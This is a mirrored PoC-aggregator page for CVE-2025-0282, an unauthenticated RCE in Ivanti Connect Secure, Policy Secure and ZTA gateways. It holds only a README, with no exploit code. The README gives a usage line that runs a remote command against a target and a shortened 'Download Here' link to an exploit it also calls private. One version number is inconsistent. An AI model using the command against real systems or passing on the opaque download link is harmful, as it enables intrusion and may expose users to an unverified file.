CVE-2025-0282 PoC — Ivanti多款产品安全漏洞

Source

https://github.com/securexploit1/CVE-2025-0282

Associated Vulnerability

Title:Ivanti多款产品安全漏洞 (CVE-2025-0282)
Description:A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.

Readme


#  CVE-2025-0282: RCE Ivanti



## Vulnerability Description

A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.


## Details
+ **CVE ID:** CVE-2025-0282
+ **Published:** 2025-01-08
+ **Exploit Availability:** Not public, only private.
+ **CVSS:** 9.0


## Affected Versions

**Ivanti Connect Secure before version 22.7R2.50**

**Ivanti Policy Secure before version 22.7R1.2**

**Ivanti Neurons for ZTA gateways before version 22.7R2.3**

## Usage
```
python exploit.py -h 10.10.10.10 -c 'uname -a'
```


## Exploit
**[Download Here](http://surl.li/vvhnzy)**

File Snapshot


 [4.0K]  /data/pocs/93c4d6cf91436acef756b2bd29612ab8bc484147
└── [ 770]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!

CVE-2025-0282 PoC — Ivanti多款产品 安全漏洞